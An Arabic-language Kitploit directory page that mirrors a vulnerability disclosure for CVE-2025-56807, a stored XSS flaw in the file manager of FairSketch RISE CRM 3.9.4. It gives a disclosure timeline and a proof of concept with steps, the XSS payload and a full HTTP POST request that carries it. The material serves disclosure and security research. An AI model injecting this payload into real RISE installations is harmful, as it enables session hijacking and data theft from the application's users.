Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-56807 — CVE-2025-56807: تم اكتشاف ثغرة تخزين البرمجة النصية عبر المواقع (XSS) في منتج FairSketch RISE Ultimate Project Manager & CRM (الإصدار 3.9.4) ضمن وظيفة مدير الملفات. | Kitploit
أدوات/GitHubGitHub/aqwainfosec/cve-2025-56807
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتأمن الويباختبار الاختراق
GitHubaqwainfosec/cve-2025-56807

CVE-2025-56807

CVE-2025-56807: تم اكتشاف ثغرة تخزين البرمجة النصية عبر المواقع (XSS) في منتج FairSketch RISE Ultimate Project Manager & CRM (الإصدار 3.9.4) ضمن وظيفة مدير الملفات.

عرض المستودع
منذ 10 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-56807

الوصف

تم اكتشاف ثغرة تخزينية من نوع Cross Site Scripting (XSS) في FairSketch RISE Ultimate Project Manager & CRM (v3.9.4) في وظيفة مدير الملفات. تكمن الثغرة في المعامل title الذي يتم إرساله عند إنشاء مجلدات جديدة. وبسبب عدم كفاية تعقيم المدخلات، يمكن للمهاجم حقن حمولات HTML/JavaScript (مثل: <details/open/ontoggle=prompt(origin)>). تُخزَّن الحمولة في اسم المجلد وتُنفَّذ عند سرد المجلدات في مدير الملفات، مما يسمح بتنفيذ أكواد JavaScript عشوائية في متصفح أي مستخدم يعرض المجلد المتأثر. وقد يؤدي ذلك إلى اختطاف الجلسة وتسريب البيانات.

[!NOTE]
هذه الثغرة لا تقتصر على حسابات المسؤول. يمكن استغلالها باستخدام أي حساب مستخدم لديه صلاحية إنشاء مجلدات جديدة في مدير الملفات.

الجدول الزمني للإفصاح

  • معرّف CVE المُعيّن: CVE-2025-56807
  • الاكتشاف: يوليو 2025 (بواسطة Aqwa Hameed)
  • إشعار البائع: تم إرسال بريد إلكتروني إلى دعم Fairsketch
  • الاستجابة: أقرّ البائع بالاستلام في 22 يوليو 2025

إثبات المفهوم (PoC)

  1. سجّل الدخول ببيانات اعتماد صالحة.

  2. انتقل إلى الملفات

    لوحة التحكم

  3. انقر على مجلد جديد

    مدير الملفات

  4. أدخل الحمولة أدناه في حقل العنوان، ثم أدخل:

root@kitploit:~
<details/open/ontoggle=prompt(origin)>

عنوان المجلد

  1. أعد تحميل صفحة مدير الملفات لتفعيل الحمولة

    تنفيذ الحمولة

الطلب

root@kitploit:~
POST /index.php/clients/save_folder HTTP/1.1
Host: rise.fairsketch.com
Cookie: [redacted]
Content-Length: 99
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: en-US,en;q=0.9
Sec-Ch-Ua: "Not=A?Brand";v="24", "Chromium";v="140"
Sec-Ch-Ua-Mobile: ?0
X-Requested-With: XMLHttpRequest
User-Agent: [redacted]
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: https://rise.fairsketch.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Accept-Encoding: gzip, deflate, br
Priority: u=1, i
Connection: keep-alive

id=&parent_id=&context=client&context_id=101&title=%3Cdetails%2Fopen%2Fontoggle%3Dprompt(origin)%3E
تنزيل الأداة